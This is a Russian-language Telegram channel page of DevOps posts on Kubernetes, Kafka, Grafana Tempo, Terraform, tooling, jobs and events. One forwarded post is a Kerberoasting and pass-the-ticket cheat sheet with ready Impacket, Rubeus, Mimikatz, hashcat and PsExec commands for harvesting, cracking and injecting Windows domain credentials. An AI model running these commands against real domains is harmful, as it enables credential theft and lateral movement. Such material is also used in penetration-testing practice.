KazDevOps – Telegram
KazDevOps
5.38K subscribers
1.3K photos
27 videos
19 files
1.3K links
Канал о DevOps во всех проявлениях: K8s, CI/CD, AppSec, AI/ML, Cloud, Linux
Поможем с DevOps: https://core247.kz/
По рекламе @UlKonovalova
Download Telegram
KazDevOps pinned a photo
☄️ Шпаргалка по дизайну-системы, у которой более 42 тысяч звёзд на GitHub — это вам не шутки 😉

Она будет интересна всем, кто хоть как-то связан с разработкой ПО. Добавив её в закладки, вы получите огромную библиотеку о таких вещах, как:

протоколы коммуникации
DevOps, CI/CD
архитектурные паттерны
базы данных
кэширование
микросервисы (и монолиты)
платежные системы
облачные сервисы и так далее

Особо хвалят диаграммы.

🚩 Ещё одна приятная новость в том, что она есть и на русском. Пользуйтесь и делитесь с коллегами!

#devops #cheatsheet

@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8🔥7👾2
Forwarded from Похек (Sergey Zybnev)
Kerberoast. Когда крадешь билеты на концерт, но не знаешь, как их использовать.
Kerberoast - это метод атаки, который используется для получения хешей паролей пользователей в Windows домене, которые будет возможно сбрутить в оффлайн режиме.

➡️ Инструменты:
Rubeus
Kerbrute
Impacket
PsExec

➡️ ASREP-Roast

➡️ Impacket
Проверка ASREP для всех пользователей домена (Требуются валидные данные учетной записи)
python2 GetNPUsers.py <Domain>/<User>:<Password> -request -dc-ip <IP> -format <John|Hashcat> | grep "$krb5asrep$"

Проверка ASREP по списку пользователей домена (не требует доменных учетных данных)
python2 GetNPUsers.py <Domain> -usersfile <UserList>  -dc-ip <IP> -format <John|Hashcat> | grep "$krb5asrep$"

➡️ Rubeus
Извлечение из всех учетных записей домена
.\Rubeus.exe asreproast
.\Rubeus.exe asreproast /format:hashcat /outfile:C:Hashes.txt

➡️ Cracking
Windows
hashcat64.exe -m 18200 c:Hashes.txt rockyou.txt

Linux
john --wordlist rockyou.txt Hashes.txt --format=krb5tgs
hashcat -m 18200 -a 3 Hashes.txt rockyou

➡️ Brute Force

➡️ Kerbrute
./kerbrute userenum <UserList> --dc <IP> --domain <Domain>

➡️ Rubeus
со списком пользователей
.\Rubeus.exe brute /users:<UserList> /passwords:<Wordlist> /domain:<Domain>

Kerberos-based Password Spraying
.\Rubeus.exe brute /passwords:<Wordlist>

➡️ Kerberoasting

➡️ Impacket
GetUserSPNs.py <Domain>/<User>:<Password> -dc-ip <IP> -request

➡️ Rubeus
Kerberoast всех пользователей домена
.\Rubeus kerberoast

Все пользователи в поздразделении OU
.\Rubeus.exe kerberoast /ou:OU=Service_Accounts,DC=Security,DC=local

Атака на конкретных пользователей
.\Rubeus.exe kerberoast /user:File_SVC

➡️ Pass-The-Ticket

➡️ Mimikatz
Сбор тикетов
sekurlsa::tickets /export

Инжект тикета
kerberos::ptt <.kirbi file>

Создать CMD с инжектированным тикетом
misc::cmd

➡️ Rubeus
Дамп тикетов
.\Rubeus.exe dump

Инжект тикета
.\Rubeus.exe ptt /ticket:<.kirbi file>

➡️ PsExec
Используется после инъекции тикетов через Rubeus или Mimikatz
.\PsExec.exe -accepteula \\<IP> cmd

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4😎2👍1
Grafana Tempo — инструмент трассировки с открытым исходным кодом. И на днях состоялся релиз версии 2.3. Рассказываем, что это и почему важно.

🚩 Немного справки: для его работы требуется только объектное хранилище, типа Google Cloud Storage или Amazon S3. Он позволяет принимать, записывать и хранить полные пути чтения наших производственных и тестовых окружений, а также окружений для разработки. Совместим с OpenTelemetry и Opentracing и интегрируется с другими инструментами, вроде Prometheus.

🚩 Что нового в Tempo 2.3:

гораздо более производительные запросы TraceQL
задержка поиска сильно сокращена за счёт новой версии бэкенда
новые структурные операторы: например, для поиска фрагментов HTTP-запросов
функция, которая показывает, какие ошибки или сообщения возникают в вашем кластере
полная поддержка атрибутов OpenTelemetry

🤝 Дальше — еще круче. Делитесь с коллегами!

#devops #grafana #trace #grafanatempo #opentelemetry

@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
👍32🔥2
Это база: нюансы работы с Redis. Часть 1

Cерия статей про неочевидные нюансы работы с Redis.

В первой части Петр, DevOps-инженер компании Nixys, подробно рассказал об основных концепциях и понятиях этой БД и подготовил чек-лист, который может помочь вам в оптимизации этого NoSQL решения.

Приятного чтения!
👍7😎4🔥2
Продолжаем делиться опытом по выходным через книги.

👉 Сегодня это — Паттерны Kubernetes. Эта книга адресована разработчикам, желающим проектировать облачные приложения для платформы Kubernetes. Наибольшую пользу из нее извлекут читатели, которые хотя бы немного знакомы с контейнерами и хотят подняться на новый уровень.

Каждый паттерн проектирования представляет собой описание реальной задачи, а решение поддерживается конкретными примерами кода. Прочитав эту книгу, вы узнаете не только о паттернах Kubernetes, но и о том, зачем они нужны и как их использовать.

Читайте и делитесь с коллегами 🤝

#devops #devopsbooks

@DevOpsKaz
👍4🔥4👾21🤮1
☄️ Подборка вакансий на выходные

DevOps инженер, eCapital, 1 500$, Алматы

DevOps инженер, eCapital, 1 500$, Астана

DevOps / Системный администратор Linux (middle/senior) Плейтокс (Playtox), По договоренности, Астана

Специалист Middle по .NET Core со знанием DevOps, ЧАСТНАЯ КОМПАНИЯ WELLDONE SCHOOL LTD, От 1 700$ до 2 600$, Алматы

DevOps Engineer (AWS), Andersen, По договоренности, Алматы

DevOps engineer (Cruise company project), RemoteMaxiru, От 2 900$ до 5 000$, Астана

DevSecOps, Мобайл Телеком-Сервис (Объединенная Компания Tele2/ALTEL), По договоренности, Алматы

#devops #DevOpsИнженер #sre #cv

@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
👍21🔥1
Недавно прошел Data Platform Meetup Kazakhstan, на котором эксперты Yandex Cloud рассказали о технологических трендах ближайших лет и задачах, в которых компаниям помогают сервисы для работы с данными.

Вот самые ключевые выводы:

🟣Демократизация машинного обучения для разных ролей и индустрий — главный тренд. Массивы данных помогают обучать модели ML, а развитие NLP позволяет применять их в аналитике: отзывы клиентов, данные социальных сетей и онлайн-обзоры.

🟣Гибкая платформа данных позволяет бизнесу быстро запускать дата-проекты и быть максимально адаптивным к любым изменениям. Многие компании всё чаще используют облако как гибкую среду для построения корпоративных хранилищ.

🟣Рост спроса на безопасность и контроль данных, а также запрос на простоту работы с BI-инструментами. Компании активно тестируют и внедряют бизнес-аналитику, требуя качественный UI, доступную техподдержку и возможность получать данные в режиме реального времени.

Особенно радует нас то, что казахстанские компании активно применяют сервисы Data Platform для речевой аналитики, разработки голосовых роботов, систем видеоаналитики и рекомендательных сервисов.

#devops #data #bi #dataops #dataplatform

@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥421
Kafka — это мощный инструмент, который помогает работать с данными в реальном времени. Предлагаем 6 вариантов, как его использовать на максимум.

👉 Для наглядности держите гифку.

1️⃣ Агрегирование журналов
— Собирает журналы из разных источников и упрощает их анализ
— Надежно и эффективно хранит эти журналы
— Помогает работать с большими объемами данных журналов

2️⃣ Потоковая передача данных
— Позволяет анализировать данные по мере их генерации
— Дает возможность быстро перемещать данные по системе
— Обеспечивает бесперебойную и непрерывную передачу данных

3️⃣ Очередь сообщений
— Надежно хранит сообщения и доставляет их в нужное место
— Следит за тем, чтобы все сообщения были доставлены, даже если есть проблемы с системой
— Позволяет различным частям системы взаимодействовать друг с другом независимо друг от друга

4️⃣ Репликация данных
— Делает бэкап
— Делает вашу систему более устойчивой к сбоям
— Распределяет данные между различными кластерами для повышения производительности

5️⃣ Сбор данных об изменениях
— Отслеживает изменения в ваших данных и сообщает о них другим системам
— Синхронизирует все системы друг с другом
— Помогает поддерживать целостность данных в динамических средах

6️⃣ Мониторинг и оповещение
— Собирает анализирует системные метрики в режиме реального времени
— Отправляет оповещения при возникновении проблем
— Сохраняет метрики для последующего анализа, чтобы вы могли улучшить свою систему

#data #dataanalytics #kafka #apache #devops

@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥8👍42
Типичные ошибки конфигурации безопасности #kubernetes:

1️⃣ Чрезмерные привилегии. Если вы предоставляете избыточные разрешения контейнерам или модулям, то это может привести к несанкционированному доступу.

2️⃣ Неадекватные сетевые политики. Неспособность определить сетевые политики приводит к неограниченной связи между подами, открывая путь для злоумышленников.

3️⃣ Отсутствие ограничений на ресурсы. Ресурсоемкие приложения могут использовать значительную часть инфраструктуры кластера, что часто приводит к нехватке памяти (OOM).

4️⃣ Чрезмерно допустимые конфигурации RBAC. Когда она предоставляет пользователям или группам больше разрешений, чем необходимо для их задач.

5️⃣ Неправильная конфигурация секретов. Неправильные права доступа, небезопасные методы хранения могут привести к угрозе безопасности и раскрытию конфиденциальных данных.

🫡 Чтобы всё работало правильно, мы в Core 24/7 предлагаем провести аудит ваших кластеров,исправить ошибки или настроить с нуля.

@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4🥱2😎2
K8sGPT — инструмент, который дарит SRE-инженерам сверхспособности. Сканирует кластеры, быстро выявляет потенциальные узкие места или аномалии в вашей инфраструктуре и дает действенные рекомендации по их устранению.

K9s
— инструмент командной строки (CLI), который упрощает управление кластером. Отслеживает его деятельность в реальном времени и записывает метрики, связанные с ресурсами кластера. В комплекте мощные средства фильтрации и просмотра.

Lens — интегрированная среда разработки (IDE), которая позволяет разворачивать и управлять кластерами напрямую из консоли, предоставляя ключевые метрики и информацию обо всем, что работает в кластере. С Lens у вас будет ясное представление о том, как работают кластеры и стеки облачных нативных приложений.

Rancher — комплексное ПО, которое решает сложные операционные проблемы и проблемы безопасности при управлении несколькими кластерами Kubernetes. Есть инструменты для работы с рабочими нагрузками. С Rancher можно управлять и развертывать кластеры из централизованного места.

#devops #rancher #lens #k8s #k9s #k8sgpt

@DevOpsKaz
🔥6👍21
FreeZnanija: Не просто канал, а ваш личный университет в мире программирования. 🌍💻

Когда каждый бит информации имеет значение, выбор правильного источника становится ключевым. FreeZnanija представляет собой бесконечный поток бесплатных курсов от топовых онлайн-школ, предназначенных специально для тех, кто ищет качество и актуальность.

С нами, каждый код становится произведением искусства. Откройте для себя мир программирования с лекциями от лучших преподавателей.

FreeZnanija: где ваша страсть к кодированию встречает бесконечные возможности обучения.
🔥2🏆2
C выпуском новой функции "пути атаки" ARMO позволяет пользователям Kubernetes легко найти и исправить самые уязвимые места в ваших кластерах, чтобы не допустить к ним злоумышленников.

👉 Рассказываем, какие типы атак бывают и как их блокировать в нашей новой мини-статье.

#devops #kubernetes #devsecops

@DevOpsKaz
👍4😎1
Dama Kazakhstan-Astana приглашает на уникальный учебный курс для архитекторов в области виртуализации данных, который проводится на русском языке только один раз в год.

Курс проводит партнёр Dama Kazakhstan-Astana — компания Denodo для:

• ИТ-специалистов и архитекторов
• менеджеров проектов
• аналитиков данных
• CDO (Chief Data Officers)

Программа курса включает в себя:

• введение в виртуализацию данных
• различные схемы виртуализации
• архитектуры развертывания
• и многое другое

Детальная программа и регистрация по ссылке
3👍1
☄️ Kyverno — приложение для управления политиками безопасности Kubernetes.

Политики безопасности представлены в Kyverno как ресурсы Kubernetes. Они способны проверять, изменять, генерировать и очищать ресурсы Kubernetes, а также проверять подписи образов и артефакты, чтобы обеспечить безопасность цепочки поставок ПО.

🚩 По сути Kyverno позволяет администраторам кластеров управлять специфическими конфигурациями среды независимо от конфигураций ресурсов, применять передовые методы настройки для своих кластеров. Kyverno можно использовать для сканирования существующих ресурсов на наличие best practises или для соблюдения их путем блокировки или изменения запросов API.

Есть и json-версия, которую можно запускать как CLI или веб-приложение с REST API.

Пользуйтесь и делитесь с коллегами 🤝

#devops #cli #kyverno #git #k8s #kubernetes

@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5🔥2👾2
Приглашаем на первый AWS Community Day Central Asia в Алматы!

🗓 Дата: 17-18 ноября 2023
🏢 Место: КБТУ, Алматы, Казахстан

☁️ AWS Community Day Central Asia — мероприятие, созданное сообществом IT-энтузиастов Казахстана, Узбекистана, Кыргызстана для обмена знаниями в области применения сервисов AWS.

Мероприятие будет состоять из трех частей на два дня.

В первый день вас ожидают технические выступления именитых спикеров в области IT из Казахстана, Узбекистана, Кыргызстана и действующих сотрудников компании AWS. Также будут и воркшопы с демонстрацией топовых функций облачных сервисов, где вы сможете вместе с опытными экспертами сделать крутые вещи.

Во второй день
вы сможете принять участие в Gameday, где будут командные задачи в игровом формате, разработанные экспертами AWS и связанные с облачными сервисами.

🎤 Хедлайнером дня станет Антон Бабенко, AWS Community Hero и Terraform-инфлюенсер, который расскажет про лучшие практики использования такого инструмента, как Terraform.

🔗 Зарегистрируйтесь на сайте и присоединяйтесь!

Не упустите эту возможность для обучения, новых знакомств с интересными людьми и обмена знаниями в мире AWS.

Ждем вас! 🚀🔥
👍321
Terraform позволяет безопасно и с точностью создавать, изменять и улучшать производственную инфраструктуру. Это инструмент, который кодифицирует API-интерфейсы в файлы конфигурации. Все для того, чтобы команды использовали их совместно, рассматривали как код, редактировали и управляли версиями.

Тема Terraform обширная — одним постом или статьей не охватить, но для этого есть энтузиасты с GitHub, которые готовят #awesome руководства.

👉 Делимся им с вами, чтобы вы добавили в закладки и передали коллегам дальше. Забирайте руководство по Terraform.

#devops #terraform #github

@DevOpsKaz
👍62🔥2
Результаты конкурса на бесплатное обучение и сертификацию от Cloud Native Computing Foundation

Поздравляем
:
@Iwanskiy
@tastemirovv
@InternetPrincee
@kaminur123
@popovalesiy
@sudozhan
@zaskhat

Каждый победитель в течение дня получит по ваучеру — мы напишем в личку!

Вы не в числе победителей? Ничего страшного. Оставайтесь с нами — впереди другие конкурсы, море полезного контента и, конечно, обучение со скидкой от наших партнёров.

#devops #конкурс

@DevOpsKaz
🔥102👍2🥱2😎2
Знакомьтесь, SuperEdge🫡

Это система, которая помогает управлять вычислительными ресурсами и контейнерными приложениями в нескольких периферийных зонах. Ресурсы и приложения управляются как единый кластер Kubernetes. Собственный кластер k8s можно легко преобразовать в кластер SuperEdge.

Расширяет возможности оркестрации контейнеров и планирования Kubernetes на периферии
Вносит ненавязчивые улучшения в Kubernetes и полностью совместим со всеми API и ресурсами Kubernetes
Поддерживает автоматическое развертывание мультирегиональных микросервисов
Мониторит работоспособность распределенных узлов
Поддерживает сетевое туннелирование с использованием TCP, HTTP, HTTPS и SSH
Обеспечивает автономность по границам L4/L5

Молодой проект собрал уже 1000 звёзд на GitHub.

#devops #kubernetes #k8s #api #superedge
Please open Telegram to view this post
VIEW IN TELEGRAM
3👍2🔥2💩1
🚩 Отчет о безопасности Kubernetes за 2023 год основан на сканировании более 200 000 облачных учетных записей. В нем ясно подчеркнуто наличие угроз на различных этапах пути атаки на кластеры Kubernetes.

Специалисты обнаружили, что общая безопасность контейнеров крайне низка, хотя известно, что эти среды являются привлекательными целями для злоумышленников (и количество попыток их взлома растет).

👉 Возможно, пока вы играетесь с настройками, кто-то уже майнит крипту с вашего кластера😉. Подробнее — в нашей новой статье. Полный отчёт там же.

#devops #k8s #kubernetes

@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4🔥1
Когда авторы этого канала учились на IT, никаких шпаргалок, онлайн-библиотек и тому подобного не было. Все собирали по крупицам.

С GitHub, где коллективно публикуют огромные энциклопедии знаний, учиться новому и не забывать старое куда проще.

👉 Забирайте себе и делитесь с коллегами — руководство по DevOps: от разработки до внедрения всех конфигураций с базовыми заметками для эффективного отладки. Там вы найдёте:

— Гайды по инструментам: от Linux и Git до Jenkins и Prometheus
— Библиотеку по Linux
— Книги
— Подготовку к собеседованию и многое другое

#devops #github

@DevOpsKaz
👍6🔥4